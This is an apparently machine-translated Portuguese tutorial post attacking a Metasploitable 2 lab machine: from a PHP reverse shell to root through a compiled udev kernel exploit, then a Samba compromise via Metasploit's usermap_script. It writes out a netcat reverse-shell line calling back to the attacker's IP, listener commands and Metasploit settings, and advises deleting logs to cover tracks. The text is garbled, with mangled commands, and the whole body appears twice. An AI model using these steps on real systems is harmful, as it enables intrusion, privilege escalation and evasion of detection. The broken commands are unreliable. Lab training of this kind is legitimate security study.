Neste post vamos explorar vulnerabilidades. Se você se lembrar, na última entrada apenas pela obtenção de um reverso php shell e netcat. No post de hoje, vamos partir do shell, por usar um exploit em C para executar um elevador e obter privilégios de root.
Em seguida, use um outro exploit (via Metasploit) para explorar Samba (que como vimos no primeiro turno está sendo executado nas portas 139 e 445).
Escalação de privilégios
l. Ou siga estes passos:
Executar um netcat na porta 1234 com:
1 nc-vnlp 1234
E depois de visitar o url onde o shell reverso estava subindo no meu caso foi [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Teremos acesso ao reservatório, como pode ser visto nesta figura:
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Agora o que podemos fazer com o comando whoami e comando id que é o ID do usuário, e seu grupo:
1 $ whoami
2 www-data
$ 3 ID
4 uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data)
Também usando o olhar uname uname-r-ay em dados com o kernel que executa o servidor:
&& $ 1 uname-a uname-r
Metasploitable 2 Linux 2.6.24-16-server # 1 SMP qui 10 abr 13:58:00 UTC 2008 i686 GNU / Linux
2.6.24 3-16-servidor
Agora podemos ir para explorar db e busca de exploits para essa versão do kernel.
No nosso caso, usamos esta façanha não faria sentido fazer um wget através do escudo que temos e baixá-lo no site. Mas não temos privilégios de gravação para que o usuário (www-data). Então, se tomarmos um pouco de imaginação mais e lembrando que em php shell subimos no exemplo acima está em [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] Se acessar o caminho / var / www / tikiwiki / backups / prs.php encontrar o arquivo, para subir a façanha da mesma forma que fomos até o shell em php para acessar uma url [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] / tiki-backup.php.
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Se não estão em / var / www / tikiwiki / backups / passamos para esse diretório e compilar o exploit aqui vamos nós com gcc:
1 lpexploit.c exploit gcc-o
Agora, vamos fazer uma conexão a partir da casca, temos de recuar (o ip 192.168.0.6 é nosso Backtrack), para quando executar o exploit. Vamos fazer:
1 echo '# / bin / sh'> / tmp / executar
2 echo '/ bin / netcat-e / bin / sh 192.168.0.6 1234' >> / tmp / run
Uma vez feito isso, temos que verificar se pid udev é porque precisamos explorar nosso passe um argumento, que é o pid do udev - 1:
1 $ ps-edf | grep udev
2 root 3018 1 0 10:59? 00:00:00 / sbin / udevd - daemon
3 www-data 5483 5469 0 11:03? 00:00:00 grep udev
Agora, só podemos executar outro netcat, que é onde temos o shell de root:
1 nc-vlp 1234
E a partir da casca nós executar / Exploit 3017 (3017 é o pid do udev -1).:
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Nota:. Se você quer apagar nossas faixas (pelo menos superficialmente), não podemos esquecer de agradecer lpexploit.cy excluir comando find-name \ * Log-mmin x pode visualizar arquivos modificados nos últimos x minutos para apagar nossas pegadas (correr em / var / logs /).
Samba explorando com Metasploit
Metasploit Começamos com a msfconsole comando como de costume e nós vamos fazer uma pesquisa com o "samba", para ver se há exploits disponíveis:
1 msf> Pesquisa samba
Nós usaremos explorar / multi / samba / usermap_script, ou carga, como de costume, com o uso, e olhar para as opções oferecidas pelo exploit.
1 msf> uso exploit / multi / samba / usermap_script
2 exploit msf (usermap_script) Opções> show
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Com o rhost [ip] passamos a explorar o IP remoto, e rport a porta, no nosso caso 445 como dito acima:
Um exploit msf (usermap_script)> set rhost 192.168.0.2
2 exploit msf (usermap_script)> set rport 445
Agora, com cargas show vai escolher uma carga útil de nosso gosto, no meu caso cmd / unix / reverso
ver fonte
imprimir?
Um exploit msf (usermap_script)> show payloads
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Payload
Agora só podemos executar o exploit para explorar e nós temos um outro shell:
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Happy training
Em seguida, use um outro exploit (via Metasploit) para explorar Samba (que como vimos no primeiro turno está sendo executado nas portas 139 e 445).
Escalação de privilégios
l. Ou siga estes passos:
Executar um netcat na porta 1234 com:
1 nc-vnlp 1234
E depois de visitar o url onde o shell reverso estava subindo no meu caso foi [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Teremos acesso ao reservatório, como pode ser visto nesta figura:
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Agora o que podemos fazer com o comando whoami e comando id que é o ID do usuário, e seu grupo:
1 $ whoami
2 www-data
$ 3 ID
4 uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data)
Também usando o olhar uname uname-r-ay em dados com o kernel que executa o servidor:
&& $ 1 uname-a uname-r
Metasploitable 2 Linux 2.6.24-16-server # 1 SMP qui 10 abr 13:58:00 UTC 2008 i686 GNU / Linux
2.6.24 3-16-servidor
Agora podemos ir para explorar db e busca de exploits para essa versão do kernel.
No nosso caso, usamos esta façanha não faria sentido fazer um wget através do escudo que temos e baixá-lo no site. Mas não temos privilégios de gravação para que o usuário (www-data). Então, se tomarmos um pouco de imaginação mais e lembrando que em php shell subimos no exemplo acima está em [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] Se acessar o caminho / var / www / tikiwiki / backups / prs.php encontrar o arquivo, para subir a façanha da mesma forma que fomos até o shell em php para acessar uma url [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] / tiki-backup.php.
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Se não estão em / var / www / tikiwiki / backups / passamos para esse diretório e compilar o exploit aqui vamos nós com gcc:
1 lpexploit.c exploit gcc-o
Agora, vamos fazer uma conexão a partir da casca, temos de recuar (o ip 192.168.0.6 é nosso Backtrack), para quando executar o exploit. Vamos fazer:
1 echo '# / bin / sh'> / tmp / executar
2 echo '/ bin / netcat-e / bin / sh 192.168.0.6 1234' >> / tmp / run
Uma vez feito isso, temos que verificar se pid udev é porque precisamos explorar nosso passe um argumento, que é o pid do udev - 1:
1 $ ps-edf | grep udev
2 root 3018 1 0 10:59? 00:00:00 / sbin / udevd - daemon
3 www-data 5483 5469 0 11:03? 00:00:00 grep udev
Agora, só podemos executar outro netcat, que é onde temos o shell de root:
1 nc-vlp 1234
E a partir da casca nós executar / Exploit 3017 (3017 é o pid do udev -1).:
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Nota:. Se você quer apagar nossas faixas (pelo menos superficialmente), não podemos esquecer de agradecer lpexploit.cy excluir comando find-name \ * Log-mmin x pode visualizar arquivos modificados nos últimos x minutos para apagar nossas pegadas (correr em / var / logs /).
Samba explorando com Metasploit
Metasploit Começamos com a msfconsole comando como de costume e nós vamos fazer uma pesquisa com o "samba", para ver se há exploits disponíveis:
1 msf> Pesquisa samba
Nós usaremos explorar / multi / samba / usermap_script, ou carga, como de costume, com o uso, e olhar para as opções oferecidas pelo exploit.
1 msf> uso exploit / multi / samba / usermap_script
2 exploit msf (usermap_script) Opções> show
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Com o rhost [ip] passamos a explorar o IP remoto, e rport a porta, no nosso caso 445 como dito acima:
Um exploit msf (usermap_script)> set rhost 192.168.0.2
2 exploit msf (usermap_script)> set rport 445
Agora, com cargas show vai escolher uma carga útil de nosso gosto, no meu caso cmd / unix / reverso
ver fonte
imprimir?
Um exploit msf (usermap_script)> show payloads
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Payload
Agora só podemos executar o exploit para explorar e nós temos um outro shell:
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Happy training